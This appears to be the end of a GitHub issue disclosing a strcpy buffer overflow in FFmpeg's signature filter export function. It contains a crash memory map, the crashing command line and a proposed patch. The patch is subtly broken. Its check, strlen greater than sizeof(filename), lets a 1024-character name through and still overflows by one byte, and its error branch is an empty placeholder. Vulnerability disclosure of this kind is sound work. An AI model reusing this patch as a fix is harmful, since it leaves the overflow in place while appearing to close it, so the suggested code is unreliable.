7fde6a92d000-7fde6aa34000 r-xp 00000000 fd:00 11025316                   /usr/lib/x86_64-linux-gnu/libSDL2-2.0.so.0.4.0
7fde6aa34000-7fde6ac34000 ---p 00107000 fd:00 11025316                   /usr/lib/x86_64-linux-gnu/libSDL2-2.0.so.0.4.0
7fde6ac34000-7fde6ac38000 r--p 00107000 fd:00 11025316                   /usr/lib/x86_64-linux-gnu/libSDL2-2.0.so.0.4.0
7fde6ac38000-7fde6ac3c000 rw-p 0010b000 fd:00 11025316                   /usr/lib/x86_64-linux-gnu/libSDL2-2.0.so.0.4.0
7fde6ac3c000-7fde6ac40000 rw-p 00000000 00:00 0
7fde6ac40000-7fde6ad39000 r-xp 00000000 fd:00 11017988                   /usr/lib/x86_64-linux-gnu/libasound.so.2.0.0
7fde6ad39000-7fde6af38000 ---p 000f9000 fd:00 11017988                   /usr/lib/x86_64-linux-gnu/libasound.so.2.0.0
7fde6af38000-7fde6af3f000 r--p 000f8000 fd:00 11017988                   /usr/lib/x86_64-linux-gnu/libasound.so.2.0.0
7fde6af3f000-7fde6af40000 rw-p 000ff000 fd:00 11017988                   /usr/lib/x86_64-linux-gnu/libasound.so.2.0.0
7fde6af40000-7fde6af46000 r-xp 00000000 fd:00 11019308                   /usr/lib/x86_64-linux-gnu/libxcb-xfixes.so.0.0.0
7fde6af46000-7fde6b146000 ---p 00006000 fd:00 11019308                   /usr/lib/x86_64-linux-gnu/libxcb-xfixes.so.0.0.0
7fde6b146000-7fde6b147000 r--p 00006000 fd:00 11019308                   /usr/lib/x86_64-linux-gnu/libxcb-xfixes.so.0.0.0
7fde6b147000-7fde6b148000 rw-p 00007000 fd:00 11019308                   /usr/lib/x86_64-linux-gnu/libxcb-xfixes.so.0.0.0
7fde6b148000-7fde6b14b000 r-xp 00000000 fd:00 11019300                   /usr/lib/x86_64-linux-gnu/libxcb-shape.so.0.0.0
7fde6b14b000-7fde6b34a000 ---p 00003000 fd:00 11019300                   /usr/lib/x86_64-linux-gnu/libxcb-shape.so.0.0.0
7fde6b34a000-7fde6b34b000 r--p 00002000 fd:00 11019300                   /usr/lib/x86_64-linux-gnu/libxcb-shape.so.0.0.0
7fde6b34b000-7fde6b34c000 rw-p 00003000 fd:00 11019300                   /usr/lib/x86_64-linux-gnu/libxcb-shape.so.0.0.0
7fde6b34c000-7fde6b34e000 r-xp 00000000 fd:00 11019302                   /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0.0.0
7fde6b34e000-7fde6b54e000 ---p 00002000 fd:00 11019302                   /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0.0.0
7fde6b54e000-7fde6b54f000 r--p 00002000 fd:00 11019302                   /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0.0.0
7fde6b54f000-7fde6b550000 rw-p 00003000 fd:00 11019302                   /usr/lib/x86_64-linux-gnu/libxcb-shm.so.0.0.0
7fde6b550000-7fde6b571000 r-xp 00000000 fd:00 11019312                   /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
7fde6b571000-7fde6b770000 ---p 00021000 fd:00 11019312                   /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
7fde6b770000-7fde6b771000 r--p 00020000 fd:00 11019312                   /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
7fde6b771000-7fde6b772000 rw-p 00021000 fd:00 11019312                   /usr/lib/x86_64-linux-gnu/libxcb.so.1.1.0
7fde6b772000-7fde6b87a000 r-xp 00000000 fd:00 1311031                    /lib/x86_64-linux-gnu/libm-2.23.so
7fde6b87a000-7fde6ba79000 ---p 00108000 fd:00 1311031                    /lib/x86_64-linux-gnu/libm-2.23.so
7fde6ba79000-7fde6ba7a000 r--p 00107000 fd:00 1311031                    /lib/x86_64-linux-gnu/libm-2.23.so
7fde6ba7a000-7fde6ba7b000 rw-p 00108000 fd:00 1311031                    /lib/x86_64-linux-gnu/libm-2.23.so
7fde6ba7b000-7fde6ba8c000 r-xp 00000000 fd:00 11017907                   /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
7fde6ba8c000-7fde6bc8b000 ---p 00011000 fd:00 11017907                   /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
7fde6bc8b000-7fde6bc8c000 r--p 00010000 fd:00 11017907                   /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
7fde6bc8c000-7fde6bc8d000 rw-p 00011000 fd:00 11017907                   /usr/lib/x86_64-linux-gnu/libXext.so.6.4.0
7fde6bc8d000-7fde6bdc2000 r-xp 00000000 fd:00 11017890                   /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
7fde6bdc2000-7fde6bfc2000 ---p 00135000 fd:00 11017890                   /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
7fde6bfc2000-7fde6bfc3000 r--p 00135000 fd:00 11017890                   /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
7fde6bfc3000-7fde6bfc7000 rw-p 00136000 fd:00 11017890                   /usr/lib/x86_64-linux-gnu/libX11.so.6.3.0
7fde6bfc7000-7fde6bfcb000 r-xp 00000000 fd:00 11017937                   /usr/lib/x86_64-linux-gnu/libXv.so.1.0.0
7fde6bfcb000-7fde6c1ca000 ---p 00004000 fd:00 11017937                   /usr/lib/x86_64-linux-gnu/libXv.so.1.0.0
7fde6c1ca000-7fde6c1cb000 r--p 00003000 fd:00 11017937                   /usr/lib/x86_64-linux-gnu/libXv.so.1.0.0
7fde6c1cb000-7fde6c1cc000 rw-p 00004000 fd:00 11017937                   /usr/lib/x86_64-linux-gnu/libXv.so.1.0.0
7fde6c1cc000-7fde6c1f2000 r-xp 00000000 fd:00 1311033                    /lib/x86_64-linux-gnu/ld-2.23.so
7fde6c328000-7fde6c333000 rw-p 00000000 00:00 0
7fde6c333000-7fde6c3b3000 r-xp 00000000 fd:00 1310808                    /lib/x86_64-linux-gnu/libsystemd.so.0.14.0
7fde6c3b3000-7fde6c3b6000 r--p 0007f000 fd:00 1310808                    /lib/x86_64-linux-gnu/libsystemd.so.0.14.0
7fde6c3b6000-7fde6c3b7000 rw-p 00082000 fd:00 1310808                    /lib/x86_64-linux-gnu/libsystemd.so.0.14.0
7fde6c3b7000-7fde6c3c6000 rw-p 00000000 00:00 0
7fde6c3f0000-7fde6c3f1000 rw-p 00000000 00:00 0
7fde6c3f1000-7fde6c3f2000 r--p 00025000 fd:00 1311033                    /lib/x86_64-linux-gnu/ld-2.23.so
7fde6c3f2000-7fde6c3f3000 rw-p 00026000 fd:00 1311033                    /lib/x86_64-linux-gnu/ld-2.23.so
7fde6c3f3000-7fde6c3f4000 rw-p 00000000 00:00 0
7fff240b9000-7fff240db000 rw-p 00000000 00:00 0                          [stack]
7fff241c3000-7fff241c6000 r--p 00000000 00:00 0                          [vvar]
7fff241c6000-7fff241c8000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
[1]    20123 abort (core dumped)  ./ffmpeg -i /home/kira/fuzzdata/samples/mkv/9bitwhite.mkv -vf  -map 0:v -f  -

The compiler turn on the FORTIFY protection by default, so it's not possible to exploit the vulnerability. However, when the protection is off, it's extremely dangerous.

Sugested repair is to check the input filename length not exceeding the buffer length.

Add these code before strcpy.

if (strlen(sic->filename) > sizeof(filename)) {
    // raise error here
}

The whole function is as following.

static int export(AVFilterContext *ctx, StreamContext *sc, int input)
{
    SignatureContext* sic = ctx->priv;
    char filename[1024];

    if (sic->nb_inputs > 1) {
        /* error already handled */
        av_assert0(av_get_frame_filename(filename, sizeof(filename), sic->filename, input) == 0);
    } else {
        if (strlen(sic->filename) > sizeof(filename)) {
    		// raise error here
		}
        strcpy(filename, sic->filename);
    }
    if (sic->format == FORMAT_XML) {
        return xml_export(ctx, sc, filename);
    } else {
        return binary_export(ctx, sc, filename);
    }
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment